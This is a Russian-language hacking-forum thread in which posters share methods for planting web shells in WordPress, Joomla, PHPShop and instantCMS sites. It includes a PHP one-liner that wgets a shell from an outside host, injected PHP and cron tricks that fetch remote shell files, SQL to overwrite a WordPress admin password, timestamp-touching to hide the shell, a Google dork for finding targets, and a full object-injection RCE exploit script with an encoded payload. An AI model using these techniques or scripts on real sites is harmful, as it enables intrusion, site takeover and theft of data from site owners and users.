Старый 17.11.2014, 05:03   #71
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Оттестировал заливку через плагины в WP

wp, 3.2.1, 3.3.1, 3.3.2, 3.6.1, 3.5.1, 3.7.1, 3.8.4, 3.9.2, 4.0 +

Быстрый линк на правку Hello Dolly, Akismet и т.д.

Правка http://[host]/wp-admin/plugin-editor.php?file=hello.php
Файл http://[host]/wp-content/plugins/hello.php

Правка http://[host]/wp-admin/plugin-editor.php?file=akismet/akismet.php
Файл http://[host]/wp-content/plugins/akismet/akismet.php

Стоит сказать, что лучше через Akismet не заливатся, так как в wp 4.0 доступ к /wp-content/plugins/akismet закрыт .htaccess..

А Hello Dolly скрипт /wp-content/plugins/hello.php вообще лежыт в видном месте.

Круче через какой-то другой плагин заливатся, например, если правим blogger-importer/blogger-importer.php

Правка http://[host]/wp-admin/plugin-editor.php?file=blogger-importer/blogger-importer.php
Файл http://[host]/wp-content/plugins/blogger-importer/blogger-importer.php

Заливка шелла. Подводные камни.
Если большие обьемы, то хочется сразу чтоб после правки шелл заливался =)
Некоторые могут не согласится, но мне больше нравится когда усе заливается 1 командой, нет левых HTML форм на ПК, не нужно все время прописывать путь к скрипту в той форме, где код выполняется и т.д.(это уже другая тема, но все-равно можно отнести косвенно к заливке через плагины в WP)

Самый удобный вариант
Код HTML:
@system('wget -O '. dirname(__FILE__) .'/love.php http://ge.tt/api/1/files/8kXCKh42/0/blob');
Для такой заливки шелл WSO 2.5.1 не годится!

Сразу после заливки хекеру нужно тачить три файла(каталог где лежит сам шелл; скрипт от WP, который правился; сам шелл).

Понятное дело, что это дело можно сделать и в WSO 2.5.1. Нормально еще когда 1 шелл, а когда 100, например, это уже ненормально. =)

Можно еще, как вариант, написать Action для WSO, чтоб можно было выбрать множество файлов и протачить их все, как в bk374k v.3, пароль 007.

Как узнать URL сайта с БД?
Ответ m0Hze в "Вопросы по уязвимостям"
Цитата:
Прочитай wp_options where option_name='siteurl'
Как сменить пароль администратора через SQL?
Цитата:
update `wp_users` set `user_pass`='$P$BBEWNAloVQRkwuJlFmaC8OchfA6DOH0' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1

Последний раз редактировалось omen666; 17.11.2014 в 05:24..
omen666 вне форума   Ответить с цитированием
Старый 22.11.2014, 21:49   #72
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Метод заливки в Joomla, которым имеет право на существование!

Имея, например, SQL inj и file_priv или любую другую читалку файлов можем прочитать файл конфигурации си-мы в корне.

Вариант 1. Если для отправки почты используется SMTP, то по идеи все отправленные письма хранятся в отправленные на сервере, итого идем на пошту и читаем токен, который был отправлен, когда сбрасываем пароль администратора.

Вариант 2. Тоже самое, только читаем почту, если есть возможность, на том же сервере где лежит сам сайт.

Вариант 3. FTP.

Вариант 4. Конект до БД, если есть возможность.

Последний раз редактировалось omen666; 22.11.2014 в 22:11.. Причина: "исходящих" немного не то
omen666 вне форума   Ответить с цитированием
Старый 02.02.2015, 14:03   #73
Hodor
 
Регистрация: 16.04.2014
Сообщений: 5
Репутация: 0
По умолчанию

подскажите как залить шелл в WP 4.1, если в config.php стоит
DISALLOW_FILE_MODS TRUE
Hodor вне форума   Ответить с цитированием
Старый 01.05.2015, 22:45   #74
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

PHPShop

Оффициальный сайт - _http://www.phpshop.ru

Google dork: intext:"Работает под управлением PHPShop.CMS"

Ребята явно постарались над безопасностью своего сайта, чего только стоит их .htaccess

Код:
## Apache ##

# Поддержка PHP 5.3 и выше
#php_value allow_call_time_pass_reference on

# Обход ошибки двойного добавление слешей в ORM
#php_flag magic_quotes_gpc off

# Отладочные сообщения PHP
#php_value error_reporting 7

# Выключение глобальных переменных PHP
#php_flag register_globals off



## PHPShop Core ##

# Кодировка windows 1251
AddDefaultCharset windows-1251

# Скачивание CSV браузерами
AddType text/csv csv

DirectoryIndex index.php
RewriteEngine On

# Редирект на www
# default - off
#RewriteCond %{HTTP_HOST} ^name\.ru
#RewriteRule ^(.*)$ http://www.name.ru/$1 [R=301,L]


#Options FollowSymLinks
#Options SymLinksIfOwnerMatch
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} (((.*)\.html$)|((.*)/))$
RewriteCond %{REQUEST_URI} !((.*)\.(.*)/)$
RewriteRule ^(.*)$ index.php

# Страница 404 ошибки
ErrorDocument 404 /404.html

# Проверка обязательного / в конце
RewriteCond %{REQUEST_URI} (map|search|compare|order|done|clients|users|gbook|links|price|news|spec|newtip)$
RewriteRule ^(.*)$ /$1/ [L,R=302]


## PHPShop Security ##

# Запрет навигации по папкам через браузер
# default - off
#Options -Indexes 

# Запрет вызовы через браузер сторонних опасных файлов шаблона
# default - off
#RewriteCond %{REQUEST_URI} ^(/phpshop/templates/(.*))
#RewriteCond %{REQUEST_URI} !((.*)\.(gif|jpg|swf|png|jpeg|js|css|GIF|JPG|PNG|JPEG|eot|svg|ttf|woff))$
#RewriteRule .* - [F]

# Запрет вызовы через браузер сторонних опасных загружаемых файлов
# Накладывает ограничение для загрузки файлов с другими расширениями
# default - off
RewriteCond %{REQUEST_URI} ^(/UserFiles/(.*))
RewriteCond %{REQUEST_URI} !((.*)\.(gif|jpg|swf|png|jpeg|js|css|GIF|JPG|PNG|JPEG|rar|zip|xml|pdf))$
RewriteRule .* - [F]

# Запрет выполнения php в загружаемых папках
# default - off
RewriteCond %{REQUEST_URI} ^((/UserFiles/(.*).(php\d?|phtml))|(/phpshop/templates/(.*).(php\d?|phtml))|(/phpshop/admpanel/csv/(.*).(php\d?|phtml)))$
RewriteRule .* - [F]


# Запрет доступа к файлам лицензии, шаблонов, конфигурации
<files ~ "\.(lic|ini|tpl)$"> 
Order Deny,Allow
Deny From All
</files>
Эксплойт для заливки шелла:

Создаём новость, в тексте пишем:

Код:
@php

$file = './UserFiles/File/xxx.png';
$current = file_get_contents('http://<my_url>/shell.txt');
file_put_contents($file, $current);

include($file);

php@
__________________
Первый VPN на основе Эллиптической криптографии. Телепортируйся в любой момент, будь невидимым с multi-vpn.biz
И да, это реклама. Просто очень нужен VPN.
BigBear вне форума   Ответить с цитированием
Старый 13.07.2015, 22:10   #75
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию instantCMS 1.9

Залил так: через FCKEditor заливаю файл с произвольным расширением (напр, 1.sss), в файле написал copy('http://mysite.com/shell.txt','/var/www/site/upload/shell.php');

В кроне создаю новую задачу, указываю путь к залитому файлу /userfiles/1.sss, запускаю задачу. Шелл в директории hackedsite.com/upload/shell.php

Узкое место здесь - наличие плагина FCKEditor, но можно через любые стандартные заливалки в админке залить файл хоть с расширением txt, код должен выполнится.

ЗЫ Абсолютный путь на сервере смотреть через phpinfo в той же админке.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 25.11.2016, 13:03   #76
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Метод не использует плагинов, нет необходимости в директории для записи, работает с кодом самой CMS (WP_Theme->__toString()). Нужен любой пользователь с возможностью редактирования профиля и подконтрольный FTP с возможностью анонимного входа (is_readable не хочет отдавать true с авторизацией).

Полезную нагрузку нужно подставить в aim/yim/jabber (в first_name/last_name не лезут нуллбайты). Файл en_US.mo нужно разместить по сгенерированному адресу.

PHP код:
<?php

/*
 * Wordpress < 3.6.1 RCE through PHP Object Injection
 * coded by crlf
 * rdot.org
 *
 * http://site.com/wordpress/wp-admin/profile.php?rce=phpinfo();
 * plural=1);}eval($_REQUEST['rce']);/*
 * 
 */

$ftp "ftp://127.0.0.1"//only host, without slash
$dir "yyyy"//any
$file "en_US.mo"//don't change this

eval("
class WP_Theme{
    private \$headers = array('Name'=>'Foo', 'TextDomain'=>'Bar');
    private \$theme_root = '
$ftp';
    private \$stylesheet = '
$dir';
}
"
);

echo 
"\nPayload (aim/yim/jabber):\n\n".urlencode(serialize(new WP_Theme))."𝌆\n\n\nCheck it:\n\n$ftp/path/to/anonymous/directory/$dir/languages/$file\n\n";

if(!
file_exists($file)) file_put_contents($filegzdecode(base64_decode('H4sIAAAAAAAAA3VRz08UMRQu4mnkxMGThx40COQxO4uaTTd7EBiQZCcuu7NqYgwpM8/Zkm47aTsESLj5L/jv+V94982OChde8vV9bb/k/fh+bT79ySjWCS8Ib1gX4wf5OSEjPCOUhB9rjNV/338TjyhvPKHjveF4LZe1RvbK/6OefUCtLf9snS7ZxNlLLAKclvAJnVfWCD62heVHuLTRFGvrAmS+UiUcNJWH3AoeTT7mcOhQBpLDkQwoeL+XvIMkgX6fJ2/F/v5uj4KEMMUr5R/VDTrdWPoAuZPGaxmsoxJjaapGVgg5yqXgs1oa5Rf/nwVHD+ksmujGSQ3H1i294KZeXf2oP+QdHSXbwzu8kvr1y/NpejZPZ/nXLVfg1rftYbwTZadZej93steLDq0JaKiZm5qKBLwOca2lMkNeLKTzGEbz/BgG97q26e/oIDWFLZWpBB9cqBB9gXaLMLMNVWu51G3T5nw6p78TNOi6SVfLBr4IofYijnWrVB73LtRtzOZk4CWSa3ZlYEfJQKslzxpTWhb9AQtsWO0xAgAA')));

?>
crlf вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot